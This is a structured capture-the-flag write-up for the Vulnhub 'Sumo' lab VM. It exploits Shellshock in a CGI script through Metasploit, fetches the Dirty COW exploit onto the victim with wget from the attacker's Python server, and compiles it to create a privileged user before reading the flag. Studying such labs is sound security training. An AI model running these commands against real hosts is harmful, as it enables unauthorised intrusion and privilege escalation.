## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnhub
  Location:
   http://10.0.2.5/cgi-bin/test
  CWE:
    CWE-0078: Improper Neutralization of Special Elements used in an OS Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Get the remote connection and get the flag inside of the file "root.txt"
  Recommendation:
    Update the tools with which the environment variables are set up
    and always check them

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Virtual Box     | 6.1           |
    | Kali Linux      | 2020.3        |
    | Firefox         | 68.10.0esr    |
    | netcat          | v1.10-41.1+b1 |
    | arp-scan        | 1.9.7         |
    | nmap            | 7.80          |
    | python          | 2.7.18        |
    | metasploit      | 5.0.99-dev    |
    | ssh             | OpenSSH_8.3p1 |
  TOE information:
    Given a file "sumo-disk1.vmdk"
    When I run it on Virtual Box
    Then I realize that the user is required to log in to the system
    And I turn off the virtual machine
    And I configure the network of this VM and of other VM with Kali
    Then I turn on the Kali VM and the Sumo VM
    And I proceed to look for the IPs of the networks with arp-scan
    And this can be seen in [evidence](img1.png)
    And I discover the IP of the Sumo VM for this case is
    """
    10.0.2.5
    """
    Then I scan with nmap the open ports of Sumo VM
    And I can see 2 open ports
    And this can be seen in [evidence](img2.png)

  Scenario: Normal use case
    Given the open port of HTTP
    When I search "http://10.0.2.5/"
    Then I access to a web page
    And this can be seen in [evidence](img3.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I access to http://10.0.2.5/
    When I try to detect site vulnerabilities running
    """
    nikto -h http://10.0.2.5/
    """
    Then I can see that the site has shellshock vulnerability in
    """
    http://10.0.2.5/cgi-bin/test
    """
    And this can be seen in [evidence](img4.png)

  Scenario: Exploitation
    Given I access to http://10.0.2.5
    When I run "msfconsole"
    Then I open metasploit
    And I use the exploit "exploit/multi/http/apache_mod_cgi_bash_env_exec"
    And I set the variable "RHOSTS" in "10.0.2.5" (Sumo VM IP)
    And I set the variable "LHOST" in "10.0.2.15" (Kali VM IP)
    And I set the variable "TARGETURI" in "/cgi-bin/test"´
    And this can be seen in [evidence](img5.png)
    Then I try to exploit the shellshock vulnerability that there is in
    """
    http://10.0.2.5/cgi-bin/test
    """
    And I run "exploit"
    Then I get a meterpreter session open
    Then I run "shell"
    And I get access to shell in "/usr/lib/cgi-bin"
    And this can be seen in [evidence](img6.png)
    Then I run "cd /tmp" to change to directory writeble
    And this can be seen in [evidence](img7.png)
    And I download the dirty script on Kali VM running
    """
    curl https://www.exploit-db.com/raw/40839 --output dirty.c
    """
    And this script creates a user on the system which runs it
    Then I try to pass the script to Sumo VM from Kali VM
    And I run "python -m SimpleHTTPServer 4444" on Kali VM
    And this can be seen in [evidence](img8.png)
    Then I run "wget 10.0.2.15:4444/dirty.c" on Sumo VM from the shell
    And this can be seen in [evidence](img9.png)
    And I get script inside of Sumo VM
    Then I run "gcc -pthread dirty.c -o dirty -lcrypt" from the shell
    And I get the executable "dirty"
    And this can be seen in [evidence](img10.png)
    Then I run "./dirty lolazo" to create the user "firefart" with pass "lolazo"
    And the user is created successfully
    And this can be seen in [evidence](img11.png)
    When I run "ssh firefart@10.0.2.5" on Kali VM to access to Sumo VM
    Then the system asks me for the password
    And I enter "lolazo"
    And I access to Sumo VM
    And this can be seen in [evidence](img12.png)
    When I run "ls" inside Sumo VM
    Then I can see the file "root.txt"
    And I run "cat root.txt"
    And I get the flag
    And this can be seen in [evidence](img13.png)

  Scenario: Remediation
    When I keep all the external tools that I use updated
    When I do security test to those tools
    Then I avoid many vulnerabilities that could be attack vectors

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.6/10 (Critical) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.2/10 (Critical) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.6/10 (Critical) - CR:L/IR:L/AR:L/MC:H/MI:H/MA:H/

  Scenario: Correlations
    No correlations have been found to this date 2021-03-31
